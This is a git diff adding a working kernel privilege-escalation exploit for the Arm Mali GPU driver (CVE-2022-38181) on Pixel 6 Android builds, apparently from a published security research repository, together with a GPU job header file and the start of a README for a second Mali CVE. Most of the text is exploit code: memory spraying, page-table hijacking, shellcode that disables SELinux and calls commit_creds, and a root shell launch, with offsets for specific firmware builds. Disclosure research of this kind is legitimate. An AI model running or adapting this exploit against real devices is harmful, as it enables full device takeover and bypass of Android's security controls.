{.gpu_addr = gpuaddr}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +int migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + return -1; + } + return 0; +} + +void* flush(int spray_cpu, int idx) { + migrate_to_cpu(spray_cpu); + void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (region == MAP_FAILED) err(1, "flush failed"); + memset(region, idx, FLUSH_SIZE); + return region; +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed"); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t alias_sprayed_regions(int mali_fd) { + union kbase_ioctl_mem_alias alias = {0}; + alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + alias.in.stride = SPRAY_PAGES; + + alias.in.nents = SPRAY_NUM; + struct base_mem_aliasing_info ai[SPRAY_NUM]; + for (int i = 0; i < SPRAY_NUM; i++) { + ai[i].handle.basep.handle = gpu_va[i]; + ai[i].length = SPRAY_PAGES; + ai[i].offset = 0; + } + alias.in.aliasing_info = (uint64_t)(&(ai[0])); + mem_alias(mali_fd, &alias); + uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES; + void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap alias failed"); + } + alias_regions[0] = region; + for (int i = 1; i < SPRAY_NUM; i++) { + void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES); + if (this_region == MAP_FAILED) { + err(1, "mmap alias failed %d\n", i); + } + alias_regions[i] = this_region; + } + return (uint64_t)region; +} + +void fault_pages() { + int read = 0; + for (int va = 0; va < SPRAY_NUM; va++) { + uint8_t* this_va = (uint8_t*)(gpu_va[va]); + *this_va = 0; + uint8_t* this_alias = alias_regions[va]; + read += *this_alias; + } + LOG("read %d\n", read); +} + +int find_freed_idx(int mali_fd) { + int freed_idx = -1; + for (int j = 0; j < SPRAY_NUM; j++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = gpu_va[j]; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query); + if (query.out.value != SPRAY_PAGES) { + LOG("jit_free commit: %d %llu\n", j, query.out.value); + freed_idx = j; + } + } + return freed_idx; +} + +int find_pgd(int freed_idx, int start_pg) { + uint64_t* this_alias = alias_regions[freed_idx]; + for (int pg = start_pg; pg < SPRAY_PAGES; pg++) { + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = this_alias[pg * 0x1000/8 + i]; + if ((entry & 0x443) == 0x443) { + return pg; + } + } + } + return -1; +} + +uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +uint32_t hi32(uint64_t x) { + return x >> 32; +} + +uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) { + void* jc_region = map_gpu(mali_fd, 1, 1, false, 0); + struct MALI_JOB_HEADER jh = {0}; + jh.is_64b = true; + jh.type = MALI_JOB_TYPE_WRITE_VALUE; + + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; + payload.type = type; + payload.immediate_value = value; + payload.address = gpu_addr; + + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh); + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload); + uint32_t* section = (uint32_t*)jc_region; + struct base_jd_atom_v2 atom = {0}; + atom.jc = (uint64_t)jc_region; + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_CS; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + usleep(10000); +} + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); + } + usleep(300000); + } + } + } +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + +void select_offset() { + char fingerprint[256]; + int len = __system_property_get("ro.build.fingerprint", fingerprint); + LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) { + avc_deny = AVC_DENY_2108; + sel_read_enforce = SEL_READ_ENFORCE_2108; + fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) { + avc_deny = AVC_DENY_2201; + sel_read_enforce = SEL_READ_ENFORCE_2201; + fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) { + avc_deny = AVC_DENY_2202; + sel_read_enforce = SEL_READ_ENFORCE_2202; + fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) { + avc_deny = AVC_DENY_2207; + sel_read_enforce = SEL_READ_ENFORCE_2207; + fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) { + avc_deny = AVC_DENY_2211; + sel_read_enforce = SEL_READ_ENFORCE_2211; + fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) { + avc_deny = AVC_DENY_2212; + sel_read_enforce = SEL_READ_ENFORCE_2212; + fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212); + return; + } + + err(1, "unable to match build id\n"); +} + +void cleanup(int mali_fd, uint64_t pgd) { + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); +} + +void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); +} + +void spray(int mali_fd) { + uint64_t cookies[32] = {0}; + for (int j = 0; j < 32; j++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22); + alloc.in.va_pages = SPRAY_PAGES; + alloc.in.commit_pages = 0; + mem_alloc(mali_fd, &alloc); + cookies[j] = alloc.out.gpu_va; + } + for (int j = 0; j < 32; j++) { + void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j]); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + gpu_va[j] = (uint64_t)region; + } + for (int j = 32; j < 64; j++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22); + alloc.in.va_pages = SPRAY_PAGES; + alloc.in.commit_pages = 0; + mem_alloc(mali_fd, &alloc); + cookies[j - 32] = alloc.out.gpu_va; + } + for (int j = 32; j < 64; j++) { + void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j - 32]); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + gpu_va[j] = (uint64_t)region; + } +} + +int trigger(int mali_fd, int mali_fd2, int* flush_idx) { + if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) { + err(1, "Out of memory."); + } + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + + uint64_t jit_pages = SPRAY_PAGES; + uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr); + atom_number++; + mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0); + for (int i = 0; i < NUM_TRIALS; i++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = jit_addr; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + flush_regions[i] = flush(SPRAY_CPU, i + *flush_idx); + if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) { + migrate_to_cpu(SPRAY_CPU); + spray(mali_fd); + for (int j = 0; j < SPRAY_NUM; j++) { + mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES); + } + LOG("region freed %d\n", i); + + uint64_t alias_region = alias_sprayed_regions(mali_fd); + fault_pages(); + LOG("cleanup flush region\n"); + for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE); + + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + jit_free(mali_fd, atom_number, jit_id); + + map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + LOG("jit_freed\n"); + int freed_idx = find_freed_idx(mali_fd); + if (freed_idx == -1) err(1, "Failed to find freed_idx"); + LOG("Found freed_idx %d\n", freed_idx); + int pgd_idx = find_pgd(freed_idx, 0); + if (pgd_idx == -1) err(1, "Failed to find pgd"); + uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000); + LOG("Found pgd %d, %lx\n", pgd_idx, pgd); + atom_number++; + write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); + cleanup(mali_fd, pgd); + return 0; + } + } + LOG("failed, retry.\n"); + jit_id++; + *flush_idx += NUM_TRIALS; + return -1; +} + +#ifdef SHELL + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + select_offset(); + int mali_fd = open_dev(MALI); + + setup_mali(mali_fd, 0); + + void* tracking_page = setup_tracking_page(mali_fd); + jit_init(mali_fd, 0x1000, 100, 0); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + int flush_idx = 0; + for (int i = 0; i < 10; i++) { + if(!trigger(mali_fd, mali_fd2, &flush_idx)) { + system("sh"); + break; + } + } +} +#else +#include +JNIEXPORT int JNICALL +Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz) +{ + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + select_offset(); + int mali_fd = open_dev(MALI); + + setup_mali(mali_fd, 0); + + void* tracking_page = setup_tracking_page(mali_fd); + jit_init(mali_fd, 0x1000, 100, 0); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + int flush_idx = 0; + for (int i = 0; i < 10; i++) { + if(!trigger(mali_fd, mali_fd2, &flush_idx)) { + LOG("uid: %d euid %d", getuid(), geteuid()); + return 0; + } + } + return -1; +} +#endif + diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h b/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h new file mode 100644 index 0000000..e0ce432 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h @@ -0,0 +1,260 @@ +#ifndef MIDGARD_H +#define MIDGARD_H + +//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone + +#include +#include +#include +#include +#include +#include +#include + +#define pan_section_ptr(base, A, S) \ + ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET)) + +#define pan_section_pack(dst, A, S, name) \ + for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \ + *_loop_terminate = (void *) (dst); \ + __builtin_expect(_loop_terminate != NULL, 1); \ + ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \ + _loop_terminate = NULL; })) + + +static inline uint64_t +__gen_uint(uint64_t v, uint32_t start, uint32_t end) +{ +#ifndef NDEBUG + const int width = end - start + 1; + if (width < 64) { + const uint64_t max = (1ull << width) - 1; + assert(v <= max); + } +#endif + + return v << start; +} + +static inline uint64_t +__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) +{ + uint64_t val = 0; + const int width = end - start + 1; + const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 ); + + for (int byte = start / 8; byte <= end / 8; byte++) { + val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); + } + + return (val >> (start % 8)) & mask; +} + +enum mali_job_type { + MALI_JOB_TYPE_NOT_STARTED = 0, + MALI_JOB_TYPE_NULL = 1, + MALI_JOB_TYPE_WRITE_VALUE = 2, + MALI_JOB_TYPE_CACHE_FLUSH = 3, + MALI_JOB_TYPE_COMPUTE = 4, + MALI_JOB_TYPE_VERTEX = 5, + MALI_JOB_TYPE_GEOMETRY = 6, + MALI_JOB_TYPE_TILER = 7, + MALI_JOB_TYPE_FUSED = 8, + MALI_JOB_TYPE_FRAGMENT = 9, +}; + +enum mali_write_value_type { + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, +}; + + +struct MALI_WRITE_VALUE_JOB_PAYLOAD { + uint64_t address; + enum mali_write_value_type type; + uint64_t immediate_value; +}; + +struct MALI_JOB_HEADER { + uint32_t exception_status; + uint32_t first_incomplete_task; + uint64_t fault_pointer; + bool is_64b; + enum mali_job_type type; + bool barrier; + bool invalidate_cache; + bool suppress_prefetch; + bool enable_texture_mapper; + bool relax_dependency_1; + bool relax_dependency_2; + uint32_t index; + uint32_t dependency_1; + uint32_t dependency_2; + uint64_t next; +}; + + +static inline void +MALI_JOB_HEADER_pack(uint32_t * restrict cl, + const struct MALI_JOB_HEADER * restrict values) +{ + cl[ 0] = __gen_uint(values->exception_status, 0, 31); + cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31); + cl[ 2] = __gen_uint(values->fault_pointer, 0, 63); + cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32; + cl[ 4] = __gen_uint(values->is_64b, 0, 0) | + __gen_uint(values->type, 1, 7) | + __gen_uint(values->barrier, 8, 8) | + __gen_uint(values->invalidate_cache, 9, 9) | + __gen_uint(values->suppress_prefetch, 11, 11) | + __gen_uint(values->enable_texture_mapper, 12, 12) | + __gen_uint(values->relax_dependency_1, 14, 14) | + __gen_uint(values->relax_dependency_2, 15, 15) | + __gen_uint(values->index, 16, 31); + cl[ 5] = __gen_uint(values->dependency_1, 0, 15) | + __gen_uint(values->dependency_2, 16, 31); + cl[ 6] = __gen_uint(values->next, 0, 63); + cl[ 7] = __gen_uint(values->next, 0, 63) >> 32; +} + + +#define MALI_JOB_HEADER_LENGTH 32 +struct mali_job_header_packed { uint32_t opaque[8]; }; +static inline void +MALI_JOB_HEADER_unpack(const uint8_t * restrict cl, + struct MALI_JOB_HEADER * restrict values) +{ + if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n"); + values->exception_status = __gen_unpack_uint(cl, 0, 31); + values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63); + values->fault_pointer = __gen_unpack_uint(cl, 64, 127); + values->is_64b = __gen_unpack_uint(cl, 128, 128); + values->type = __gen_unpack_uint(cl, 129, 135); + values->barrier = __gen_unpack_uint(cl, 136, 136); + values->invalidate_cache = __gen_unpack_uint(cl, 137, 137); + values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139); + values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140); + values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142); + values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143); + values->index = __gen_unpack_uint(cl, 144, 159); + values->dependency_1 = __gen_unpack_uint(cl, 160, 175); + values->dependency_2 = __gen_unpack_uint(cl, 176, 191); + values->next = __gen_unpack_uint(cl, 192, 255); +} + +static inline const char * +mali_job_type_as_str(enum mali_job_type imm) +{ + switch (imm) { + case MALI_JOB_TYPE_NOT_STARTED: return "Not started"; + case MALI_JOB_TYPE_NULL: return "Null"; + case MALI_JOB_TYPE_WRITE_VALUE: return "Write value"; + case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush"; + case MALI_JOB_TYPE_COMPUTE: return "Compute"; + case MALI_JOB_TYPE_VERTEX: return "Vertex"; + case MALI_JOB_TYPE_GEOMETRY: return "Geometry"; + case MALI_JOB_TYPE_TILER: return "Tiler"; + case MALI_JOB_TYPE_FUSED: return "Fused"; + case MALI_JOB_TYPE_FRAGMENT: return "Fragment"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent) +{ + fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status); + fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task); + fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer); + fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false"); + fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type)); + fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false"); + fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false"); + fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false"); + fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false"); + fprintf(fp, "%*sIndex: %u\n", indent, "", values->index); + fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1); + fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2); + fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next); +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl, + const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + cl[ 0] = __gen_uint(values->address, 0, 63); + cl[ 1] = __gen_uint(values->address, 0, 63) >> 32; + cl[ 2] = __gen_uint(values->type, 0, 31); + cl[ 3] = 0; + cl[ 4] = __gen_uint(values->immediate_value, 0, 63); + cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32; +} + + +#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24 +#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0 + + +struct mali_write_value_job_payload_packed { uint32_t opaque[6]; }; +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl, + struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n"); + values->address = __gen_unpack_uint(cl, 0, 63); + values->type = __gen_unpack_uint(cl, 64, 95); + values->immediate_value = __gen_unpack_uint(cl, 128, 191); +} + +static inline const char * +mali_write_value_type_as_str(enum mali_write_value_type imm) +{ + switch (imm) { + case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter"; + case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp"; + case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent) +{ + fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address); + fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type)); + fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value); +} + +struct mali_write_value_job_packed { + uint32_t opaque[14]; +}; + +#define MALI_JOB_HEADER_header \ + .is_64b = true + +#define MALI_WRITE_VALUE_JOB_LENGTH 56 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32 + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/README.md b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md new file mode 100644 index 0000000..c16225f --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md @@ -0,0 +1,54 @@ +## Exploit for CVE-2022-46395 + +The write up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root. + +The exploit is tested on the Google Pixel 6 with the 